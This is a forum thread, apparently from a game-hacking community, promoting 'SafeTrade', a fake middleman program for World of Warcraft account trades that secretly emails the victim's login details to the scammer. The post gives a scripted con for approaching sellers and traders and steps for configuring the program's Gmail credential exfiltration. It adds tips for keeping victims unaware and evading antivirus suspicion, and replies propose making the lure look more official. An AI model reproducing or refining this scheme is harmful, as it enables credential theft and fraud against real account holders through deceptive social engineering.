Intro:
So, I was looking through the scam section trying to come up with "the next big scam" and wanted some thing NEW this time. So, when I saw the word SafeTrade from others topics, What popped into my mind was sort of an electronic "middleman". It could be account selling, or account trading, and it would send the info to each person once recieved (trading) or send info and money (selling).
The Scam:
Basically what this is, is you can do one of two things, Trade an Account, or Buy One.
"Buying An Account": You would go to markeedragon, and find a victim who is selling their account. Contact them on AIM saying something along the lines of, I do not want to get scammed out of my money, can we use SafeTrade? They will ask what it is, and you will tell them that it is sort of like an electronic middle man, and you will give them the download link.
"Trading An Account": You will contact someone on markeedragon who is trading their account, and when you get to the part where you exchange info, tell them, I really don't want to be scammed, can we use SafeTrade? This person will ask what it is, and you will tell them that its an election middle man, they enter their info, you tell them you entered yours, and that it will be e-mailed to them shortly.
What is SafeTrade:
SafeTrade is a program that Clain made (MUCH THANKS!). Basically there are two tabs one for Account Selling and one for Account Trading. This looks like a middle man, two users enter data, and it gets traded, but what really happens is it is just sent to your e-mail. You can download SafeTrade here

This is the source, there is a README on how to compile it, but to keep the leechers away it is password protected, you need at least 30 rep and you need to PM me for the password.
Basic Overview/Process:
- You find a victim on Markeedragon (trading or selling)
- You contact them about trading/selling and when the transaction is about to being you tell then about SafeTrade
- They download it then you say, you enter your info, and when the database has collected the info it will be sent to your e-mail address.
- You check your e-mail, and get their info.
- They say wtf, it didn't work, and you would say, it didn't work for me either :/
- You got an account with full info!

Notes:
To change the email do the following.
1. Open the project file in Visual Basic 2008.
2. Go to Main.VB and go to the region "Other"
3. Uncomment the two lines of code and specify your email information.
4. Run the program (Click Debug) and Copy the text in the textboxes on the tab "Account Selling"
Secret Question ::::: Password - copy the code into
Answer ::::: Username
5. Stop debugging the program (F5) and go to the region "Email Information"
6. Copy the first code like this.
Dim user As String = "CODE FROM THE ANSWER TEXTBOX"
Dim pass As String = "CODE FROM THE SQ TEXTBOX"
7. Hit build and share your program
YOU MUST USE A G-MAIL ACCOUNT.

The beauty of this is, you have the freedom to choose if you want to scam an account in the trading section or an account in the selling section.
I am surprise how much this has worked. If you use the scam, I beg of you to try to make it so the person doesn't think their are scammed, don't say HAHA I SCAMMED YOU! Because then SafeTrade will get rep for a scamming program and this wont work. Also, if you spread this to leechers, and crack the download, you do realize that it won't work anymore.
I know that people are saying, "Why Blizzard SafeTrade?" Lots of people know Blizzard is against trading, a great excuse for this is to say that it is not made by Blizzard, but for Blizzard World of Warcraft Accounts, and is in no way related.

It's about time someone came up with so,ething new. I was worried this was going to be a ripoff because of the title but I'm glad it's not. My only suggestion is to make it more blizzlike.
For example, add the WoW Logo or a Simple WoW Theme. And Maybe a small link on the bottom, but it just takes them to [Only registered and activated users can see links. ]

The only thing that is holding me back from this is the fact that people know that Blizz is against trading
I disagree-- everyone ive ever traded with/scammed is fairly aware that it is against blizz policy to trade an account.... so why would blizzard have a program for trading them
BUT... if you do find someone-- this is an EXCELLENT program

If I was the victim here and didn't know it I still would never execute a file that was given to me by a stranger
The thing is, this is not a virus, thats the best thing, you could scan the living bejesus out of it and nothing would come up.
I know the UI is rough ATM, but its version 1.0. I am very thankfull that Clain made this late last night. We will work on improvements I am sure, as it is not perfet ATM. Thanks for your posts!
Shouldn't this have a field under trading/selling for people to type in where the info is going to go.. that way it makes it look more legit?
This gave me an idea. You need your own SafeTrade Trade ID# so like tell them our ID is # 54936 and they will type that into a blank and think that its trading with you.
